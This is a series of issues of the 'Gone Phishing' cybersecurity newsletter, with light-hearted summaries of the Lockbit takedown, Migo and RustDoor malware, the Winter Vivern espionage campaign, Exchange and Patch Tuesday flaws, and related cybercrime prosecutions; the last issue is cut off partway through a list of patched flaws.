UK Leads Operation Against Ransomware Giant ๐Ÿ”๐ŸŒ

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that wants to honour those on the frontlines of the cyberwar who are forever patching and updating. Theyโ€™ve taken a leaf out of the UKโ€™s nuclear program: if at first you donโ€™t succeed, Tri, Tri, again ๐Ÿ˜ฌ๐Ÿ™ˆ๐Ÿคฃ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ’‚ Rule Britannia! UKโ€™s FBI (NSA) throws a spanner in Lockbitโ€™s works ๐Ÿ”ง

  • โ›๏ธ Mine how you go! Migo malware targets Redis servers for crypto mining

  • ๐Ÿ‘พ More than 28,500 Exchange servers vulnerable to actively exploited bug

UK: We wonโ€™t rest until we have them under Lockbit and key ๐Ÿ”๐Ÿ‘€๐Ÿ‘ฎ

๐Ÿ”’ Major Blow to Cybercrime: UK Leads Operation Against Ransomware Giant ๐Ÿ”๐ŸŒ

The UK has spearheaded an operation targeting Lockbit, believed to be the world's largest criminal ransomware group. Led by the National Crime Agency (NCA), the operation marks a significant disruption to the cybercriminal landscape. ๐Ÿ‡ฌ๐Ÿ‡ง๐Ÿ’ป

Lockbit, suspected to operate out of Russia, is notorious for its ransomware activities, offering services to other criminal entities. The NCA successfully infiltrated Lockbit's systems, seizing crucial data and taking control of the group's operations. ๐Ÿ•ต๏ธโ€โ™‚๏ธ๐Ÿ›ก๏ธ

The impact of the operation is profound, with law enforcement agencies from around the world, including the FBI and Europol, joining forces to combat this cyber threat. This coordinated effort signals a new era in combating cybercrime, with the UK taking a leading role. ๐ŸŒ๐Ÿ”“

Lockbit's modus operandi involves hacking into the systems of companies and organisations, encrypting data, and demanding ransom payments. The group's targets include high-profile entities such as Royal Mail, Industrial & Commercial Bank of China (ICBC), and suppliers to the NHS. ๐Ÿ’ผ๐Ÿ’ฐ

The operation, which had been underway covertly, culminated in a public phase, where law enforcement agencies took control of Lockbit's dark web site. Instead of criminal activities, visitors were greeted with messages indicating law enforcement control and collaboration. ๐Ÿšจ๐Ÿ”จ

The disruption not only impacts Lockbit's operations but also exposes the inner workings of the group. Law enforcement agencies obtained critical data, shedding light on the true scale of Lockbit's activities. ๐Ÿ’ก๐Ÿ”

Lockbit operates by providing criminal services to affiliates, offering hacking tools and guidance. However, following the operation, affiliates attempting to access Lockbit's site were met with warnings that their details were now in the hands of law enforcement. ๐Ÿ›‘๐Ÿ’ป

The operation aims not only to disrupt Lockbit's activities but also to undermine its credibility and reputation. By exposing the group's operations and targeting its affiliates, law enforcement hopes to deter future criminal collaboration. ๐Ÿ›ก๏ธโŒ

While Lockbit's operators remain beyond the reach of law enforcement, this operation represents a significant step forward in combating cyber threats and safeguarding digital ecosystems. The collaborative effort sends a clear message: cybercrime will not go unchecked. ๐Ÿค๐Ÿšซ

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Hackers be like hola, aMigo ๐Ÿ’ƒ

๐Ÿ”’ New Cryptojacking Campaign Targets Redis Servers ๐Ÿ”๐Ÿ–ฅ๏ธ

A fresh malware campaign has surfaced, taking aim at Redis servers to kickstart cryptocurrency mining on compromised Linux systems.

Dubbed Migo, this Golang ELF binary boasts compile-time obfuscation and persistence capabilities, making it a formidable threat to Linux hosts.

Cado security researcher Matt Muir shed light on the campaign, highlighting the attackers' use of innovative tactics to weaken system defences and exploit Redis vulnerabilities. ๐Ÿ•ต๏ธโ€โ™‚๏ธ๐Ÿ’ป

The attack begins with a series of commands aimed at disabling key Redis configuration options, paving the way for subsequent exploitation without raising suspicion. ๐Ÿ› ๏ธ๐Ÿ”“

Once inside, threat actors set up Redis keys to establish persistence and fetch the primary payload from Transfer.sh, a file transfer service. This method, previously spotted in early 2023, remains a favoured technique among cybercriminals. ๐Ÿ“‚๐Ÿ”—

Migo, the core malware, then springs into action, downloading an XMRig installer from GitHub and executing steps to maintain persistence, terminate rival miners, and launch the cryptocurrency mining operation. ๐Ÿ’ฐโ›๏ธ

To evade detection, Migo takes measures to disable SELinux, hide processes, and eliminate monitoring agents. These tactics bear resemblance to those employed by notorious cryptojacking groups such as TeamTNT and Rocke. ๐Ÿ›ก๏ธ๐Ÿ”

Migo's recursive scanning of system files under /etc presents a unique challenge for analysis, potentially aimed at confusing sandbox environments or tailoring attacks to specific targets. ๐Ÿ”„๐Ÿ”

In essence, Migo underscores the evolving sophistication of cloud-focused attackers, highlighting the need for robust security measures to protect web-facing services. ๐Ÿ’ก๐ŸŒ

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

This is really bugging us ๐ŸฆŸ๐Ÿ™ƒ๐Ÿ’€ Itโ€™s a bug in the wild ๐Ÿ’๐Ÿฆง๐Ÿ๐Ÿฆœ๐ŸŒด

๐Ÿšจ Critical Vulnerability in Microsoft Exchange Servers ๐Ÿšจ

A critical severity privilege escalation flaw, CVE-2024-21410, poses a significant threat to up to 97,000 Microsoft Exchange servers worldwide. ๐ŸŒ๐Ÿ’ผ

Initially exploited as a zero-day, this vulnerability enables remote unauthenticated actors to execute NTLM relay attacks, potentially granting them elevated privileges on affected systems. ๐Ÿ›ก๏ธ๐Ÿ”“

Although Microsoft released a patch on February 13 to address the issue, a substantial number of servers remain vulnerable, with approximately 28,500 confirmed cases. ๐Ÿ”’๐Ÿ“‰

Shadowserver's threat monitoring service identified Germany, the United States, and the United Kingdom as the most impacted countries, emphasising the global reach of this security concern.

While there's currently no publicly available exploit for CVE-2024-21410, the potential consequences of exploitation underscore the urgency for system administrators to apply the necessary updates and mitigations. โš ๏ธ๐Ÿ’ป

To safeguard against this threat, organisations are advised to deploy Exchange Server 2019 Cumulative Update 14 (CU14), which includes NTLM credentials Relay Protections. ๐Ÿ›ก๏ธ๐Ÿ”’

Furthermore, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has listed CVE-2024-21410 as a 'Known Exploited Vulnerability,' urging federal agencies to take action by March 7, 2024. ๐Ÿ‡บ๐Ÿ‡ธ๐Ÿ”

Failure to address this vulnerability could result in severe consequences, including unauthorised access to confidential data and the potential for further network exploitation. ๐Ÿ›‘๐Ÿ”

In summary, swift action is essential to mitigate the risk posed by CVE-2024-21410 and protect organisations from potential exploitation. ๐Ÿ›ก๏ธ๐Ÿ’ผ

Itโ€™s a jungle out there, folks! ๐Ÿฆ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

80+ organisations targeted by Russian hackers

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s forever fishing for phishing ๐ŸŽฃ๐Ÿ™ˆ๐Ÿ’€

Todayโ€™s hottest cybersecurity news stories:

  • ๐ŸŒ 80+ organisations targeted by Russian hackers Winter Vivernย ๐Ÿ‘จโ€๐Ÿ’ป

  • ๐Ÿ”ฅ Google fights fire with fire with new AI-fueled cybersecurity initiative ๐Ÿค–

  • โš ๏ธ Meta warning! 8 spyware firms target iOS, Android, and Windows ๐Ÿ“ฑโš–๏ธ

We have reached the Winter of our discontent ๐Ÿฅถ๐Ÿฅถ๐Ÿฅถ

๐Ÿšจ Winter Vivern Cyber Espionage Campaign Unveiled ๐Ÿ”’

A new cyber espionage endeavour, likely orchestrated by threat actors with ties to Belarus and Russia, has come to light, targeting over 80 organisations, primarily situated in Georgia, Poland, and Ukraine. This sophisticated operation exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers, according to findings by Recorded Future. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

The intrusion set has been attributed to Winter Vivern, also known as TA473 and UAC0114, and is tracked by Recorded Future under Threat Activity Group 70 (TAG-70). This group's exploitation of security vulnerabilities in Roundcube software mirrors tactics previously observed in Russia-linked threat actor groups like APT28, APT29, and Sandworm, who have a history of targeting email platforms. ๐Ÿ“ง

Winter Vivern's activities, traced back to at least December 2020, include leveraging a patched vulnerability in Zimbra Collaboration email software last year to infiltrate organisations in Moldova and Tunisia. The recent campaign, spanning early to mid-October 2023, aimed at gathering intelligence on European political and military affairs, coincided with additional TAG-70 actions against Uzbekistan government mail servers detected in March 2023. ๐Ÿ“†

Recorded Future noted the sophisticated nature of TAG-70's attack methods, combining social engineering tactics with XSS vulnerabilities in Roundcube to breach targeted mail servers, effectively bypassing government and military organisations' defences. The attack chains involve delivering JavaScript payloads via Roundcube flaws to exfiltrate user credentials to a command-and-control (C2) server. ๐Ÿ›ก๏ธ

Furthermore, evidence points to TAG-70 targeting Iranian embassies in Russia and the Netherlands, along with the Georgian Embassy in Sweden, indicating a broader geopolitical interest in assessing Iran's diplomatic activities, particularly concerning its support for Russia in Ukraine, and monitoring Georgia's pursuit of European Union (EU) and NATO accession. ๐ŸŒ

This revelation underscores the persistent and evolving threat landscape of cyber espionage, emphasising the necessity for robust cybersecurity measures and international cooperation to counter such clandestine operations. ๐Ÿ’ป๐Ÿ›ก๏ธ

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Google: I can be your umbrella, ella, ella AI, AI, AI ๐ŸŽถ๐Ÿค–โ˜‚๏ธ

๐Ÿšจ Google Spearheads AI Cyber Defense Initiative ๐Ÿ›ก๏ธ

Google has launched a groundbreaking initiative to advance the integration of artificial intelligence (AI) in cybersecurity, recognizing AI's pivotal role in fortifying digital security and potentially tipping the scales in favour of defenders over attackers.

With the belief that AI offers a significant advantage in threat detection, malware analysis, vulnerability detection, fixing, and incident response, Google's AI Cyber Defense Initiative aims to democratise AI in security. The initiative encompasses investment in AI-ready infrastructure, development of defensive tools and research, and provision of AI security training.

Google emphasises the need for collaborative efforts between public and private entities to fortify AI from its foundation, empower defenders, and foster research cooperation. To this end, Google is expanding its AI for Cybersecurity Program, selecting 17 startups from the UK, US, and EU, and enhancing its Cybersecurity Seminars Program to train cybersecurity experts in underserved communities across Europe.

Moreover, Google has open-sourced Magika, an AI-driven tool for malware detection, used in Google Drive, Gmail, and Safe Browsing, and available on VirusTotal. To drive advancements in AI-powered security, Google is offering $2 million in research grants and forging strategic partnerships with leading institutions like The University of Chicago, Carnegie Mellon, and Stanford.

Google envisions the AI revolution as a catalyst for addressing longstanding security challenges, paving the way for a safe, secure, and trusted digital landscape. As AI continues to evolve, Google is at the forefront, leveraging its expertise and resources to realise the full potential of AI in safeguarding digital ecosystems. ๐Ÿ’ป๐Ÿ›ก๏ธ

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

No Meta what your phone is, No Meta what you do ๐ŸŽถ๐Ÿ‘€๐Ÿ™ƒ

๐Ÿšจ Meta Exposes International Spyware Network ๐Ÿ•ต๏ธโ€โ™‚๏ธ๐Ÿ”“

Meta Platforms has uncovered and taken action against a network of eight companies operating in Italy, Spain, and the United Arab Emirates (U.A.E.) involved in the surveillance-for-hire industry, as revealed in its Adversarial Threat Report for the fourth quarter of 2023. ๐Ÿ“Š๐Ÿ”๐Ÿ”’

These firms, including Cy4Gate/ELT Group, RCS Labs, IPS Intelligence, Variston IT, TrueL IT, Protect Electronic Systems, Negg Group, and Mollitiam Industries, targeted iOS, Android, and Windows devices with various malware capable of collecting extensive data, including device information, location, media, contacts, emails, social media interactions, and more. ๐Ÿ“ฑ๐Ÿ’ป๐Ÿ“‹

They also exploited vulnerabilities in popular platforms like Facebook, Instagram, and X (formerly Twitter) through scraping, social engineering, and phishing techniques. ๐ŸŽฃ๐Ÿ”จ๐Ÿ”“

For instance, the fictitious personas associated with RCS Labs tricked users into providing personal details, while Variston IT utilised Facebook and Instagram accounts for exploit development and testing. ๐Ÿ•ต๏ธโ€โ™‚๏ธ๐Ÿ’ฌ๐Ÿ”ง

Meta identified accounts used by Negg Group for spyware testing and traced Mollitiam Industries' activities to scrape public information. ๐Ÿ“ก๐Ÿ”

In addition to tackling the spyware network, Meta removed over 2,000 accounts, Pages, and Groups from Facebook and Instagram originating from China, Myanmar, and Ukraine for coordinated inauthentic behaviour (CIB). Notably, the Chinese cluster targeted U.S. audiences with content critical of U.S. foreign policy, while the network from Myanmar disseminated pro-military propaganda. The Ukrainian cluster supported specific politicians while criticising opposition figures in Kazakhstan.

Amidst these actions, Meta introduced new security features like Control Flow Integrity (CFI) on Messenger for Android and VoIP memory isolation for WhatsApp to bolster defences against exploitation. Nonetheless, the surveillance industry persists, with new tools like Patternz, leveraging real-time bidding (RTB) advertising data, and revelations about MMS Fingerprint, a mobile network attack allegedly utilised by NSO Group. ๐Ÿ›ก๏ธ๐Ÿ› ๏ธ๐Ÿ•ต๏ธโ€โ™‚๏ธ

The exposure of these activities underscores the ongoing battle against sophisticated cyber threats, prompting concerted efforts from tech companies and governments to safeguard digital ecosystems and protect user privacy and security. ๐ŸŒ๐Ÿ”’๐Ÿ›ก๏ธ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

RustDoor targets crypto firms w/ fake jobs

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that wonders whether banning phones at school in the UK will be the source of many a hacking villain origin story ๐Ÿ’€๐Ÿ’€๐Ÿ’€

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ’ป Mac users beware! RustDoor targets crypto firms w/ fake jobs ๐Ÿ’ผ

  • ๐ŸŒ Amazon Web Services struck by bulk smishing attacks via SNS ๐Ÿ’ฌ

  • ๐Ÿ‘ฎ FBI most wanted hacker behind Zeus, IcedID malware pleads guilty โš–๏ธ

Hackers: Donโ€™t call us. Weโ€™ll call you ๐Ÿ‘€๐Ÿ˜ฌ๐Ÿ’€

๐Ÿšจ Cryptocurrency Sector Targeted by RustDoor macOS Malware ๐Ÿ”’

A wave of cyber threats has hit multiple companies in the cryptocurrency industry, with a newly discovered macOS backdoor named RustDoor at the centre of the storm. ๐ŸŒช๏ธ

Unveiled by Bitdefender, RustDoor operates as a Rust-based malware capable of stealing and uploading files, along with harvesting machine information. It cunningly disguises itself as a Visual Studio update to infiltrate systems. ๐Ÿ› ๏ธ

The attack unfolds with first-stage downloaders masquerading as job offer PDFs. Once opened, these scripts fetch and execute the malware while presenting a decoy PDF to mask their malicious activities. ๐Ÿ“‚

Bitdefender's investigation uncovered additional layers of the attack chain, revealing ZIP archives housing shell scripts responsible for fetching RustDoor from a designated website. Meanwhile, Golang-based binaries communicate with a command-and-control domain, extracting detailed system information and victim data. ๐Ÿ’ป

Interestingly, the attack targets senior engineering staff, with victims predominantly located in Hong Kong and Lagos, Nigeria. This strategic focus suggests a well-thought-out campaign aimed at high-value targets. ๐ŸŽฏ

The rise of such sophisticated threats coincides with revelations from South Korea's National Intelligence Service, implicating a North Korean-affiliated IT organisation in a malware-as-a-service operation.

This underscores the global nature of cyber threats and the importance of robust cybersecurity measures. ๐ŸŒ๐Ÿ›ก๏ธ

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Itโ€™s your classic smish and grab attack ๐Ÿ™ˆ๐Ÿ™ˆ๐Ÿ™ˆ

๐Ÿšจ SNS Sender: The AWS-Supported Smishing Tool ๐Ÿ“ฑ

A dangerous trend has emerged with the rise of a malicious Python script dubbed SNS Sender, which capitalises on Amazon Web Services (AWS) Simple Notification Service (SNS) to orchestrate bulk smishing attacks. ๐Ÿ

Attributed to a threat actor named ARDUINO_DAS, this tool enables threat actors to dispatch SMS phishing messages, often posing as messages from the United States Postal Service (USPS) regarding missed package deliveries. These deceptive texts harbor malicious links aimed at pilfering victims' personally identifiable information (PII) and financial details. ๐Ÿ’ณ

What sets SNS Sender apart is its unique approach of leveraging AWS SNS for SMS spamming, a first observed in the wild. The tool operates by necessitating a set of prerequisites including a list of phishing links, AWS access keys, target phone numbers, sender IDs, and message content. Notably, the requirement for sender IDs varies across countries, suggesting the tool's origin from a region where sender IDs are customary. ๐ŸŒ

Evidence suggests that this operation has been active since at least July 2022, as indicated by bank logs referencing ARDUINO_DAS shared on carding forums. The phishing kits associated with this campaign predominantly impersonate USPS, directing victims to counterfeit package tracking pages soliciting personal and financial information. ๐Ÿ“ฆ

Moreover, the emergence of SNS Sender reflects the persistent efforts of commodity threat actors to exploit cloud environments for their nefarious campaigns. Past incidents have highlighted similar exploitation of AWS access keys to infiltrate servers and execute SMS campaigns via SNS. ๐Ÿ›ก๏ธ

In a broader context, the cybersecurity landscape continues to witness innovation in tactics employed by threat actors. Recent examples include the utilisation of advertising networks and legitimate platforms like Discord to propagate malware, underscoring the need for robust defence measures and heightened vigilance. ๐Ÿ”’

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Oh how the mighty have fallen ๐Ÿ”ฑ Better put that banking trojan on Ice, bro ๐Ÿ˜‚

๐Ÿšจ Ukrainian Cybercriminal's Guilty Plea: Zeus and IcedID Schemes ๐Ÿ›ก๏ธ

Vyacheslav Igorevich Penchukov, also known as Vyacheslav Igoravich Andreev, 37, has confessed to orchestrating two significant malware campaigns, Zeus and IcedID, spanning over a decade from May 2009 to February 2021. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Penchukov's arrest by Swiss authorities in October 2022, followed by his extradition to the U.S. last year, culminated in his recent guilty plea.

He was previously listed on the FBI's most-wanted roster since 2012. The U.S. Department of Justice (DoJ) labelled him as a leader of these two notorious malware factions, responsible for infecting countless computers worldwide, leading to substantial financial losses and ransomware incidents. ๐Ÿ’ฐ

The Zeus banking trojan, one of his flagship creations, was instrumental in pilfering bank account details, passwords, and other sensitive information necessary for online banking access. Penchukov and his associates, under the guise of the Jabber Zeus gang, impersonated victims' employees to initiate unauthorised fund transfers, routing the illicitly acquired funds through a network of "money mules" before funnelling them to offshore accounts. ๐Ÿฆ

Additionally, Penchukov's involvement extended to the IcedID malware scheme, starting in November 2018. IcedID, also known as BokBot, functions as an information stealer and payload loader, facilitating further cyberattacks, including ransomware. Despite evading Ukrainian prosecution for years, attributed to political connections, Penchukov's eventual extradition and subsequent admission of guilt to racketeering and wire fraud charges signify a significant victory for cybercrime justice. โš–๏ธ

Meanwhile, in another development, the DoJ announced the extradition of Mark Sokolovsky, a 28-year-old Ukrainian national, from the Netherlands. Sokolovsky faces charges related to operating and advertising Raccoon, an infostealer, on a malware-as-a-service model. Raccoon, available since April 2019, was used in email phishing schemes to pilfer personal data, including login credentials and financial information, affecting millions of users worldwide. ๐Ÿฆ

These cases underscore the global effort to combat cybercrime, highlighting the ongoing battle against cybercriminals' sophisticated tactics and the importance of international cooperation in apprehending and prosecuting offenders. ๐Ÿ”

Keep up the good work, lads ๐Ÿป The police, not the hackers! ๐Ÿ™ˆ Unit next time, folks.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

Deepfakes employed by Chinese hackers in mobile banking attacks

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s got that fry day feeling ๐ŸŽฃ๐Ÿค๐Ÿ™ƒ So, letโ€™s getting cooking! ๐Ÿณ

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

Check out these freshly hatched patches ๐Ÿฃ๐Ÿฃ๐Ÿฃ

Happy Shrove Patch Tuesday ๐Ÿฅž๐Ÿฉน๐Ÿ˜‰

๐Ÿ›ก๏ธ Microsoft's February Patch Tuesday Update: 73 Flaws Fixed! ๐Ÿš€

Microsoft's latest Patch Tuesday has rolled out, addressing a whopping 73 security vulnerabilities across its software lineup, with 2 zero-days actively exploited by cyber attackers. ๐ŸŽ‰ Among these, 5 are critical, 65 important, and 3 moderate in severity. Notably, 24 fixes have been implemented in the Chromium-based Edge browser since January. ๐Ÿ’ป

๐Ÿ” Key Vulnerabilities

  • ย CVE-2024-21351: Windows SmartScreen Bypass (CVSS: 7.6)

  • CVE-2024-21412: Internet Shortcut Files Bypass (CVSS: 8.1)

These flaws allow attackers to inject and execute malicious code, circumventing security measures like SmartScreen. ๐Ÿšซ Users must beware of opening suspicious files to avoid exploitation. ๐Ÿ›‘ CVE-2024-21351 marks the second SmartScreen bypass after CVE-2023-36025, exploited by multiple hacking groups. Trend Micro links CVE-2024-21412 to Water Hydra's advanced attacks targeting financial markets. ๐ŸŒŠ

๐Ÿšจ Critical Flaws Patched

  • Windows Hyper-V DoS

  • Windows PGM Remote Code Execution

  • Microsoft Dynamics NAV Info Disclosure

  • Microsoft Exchange Server Privilege Escalation

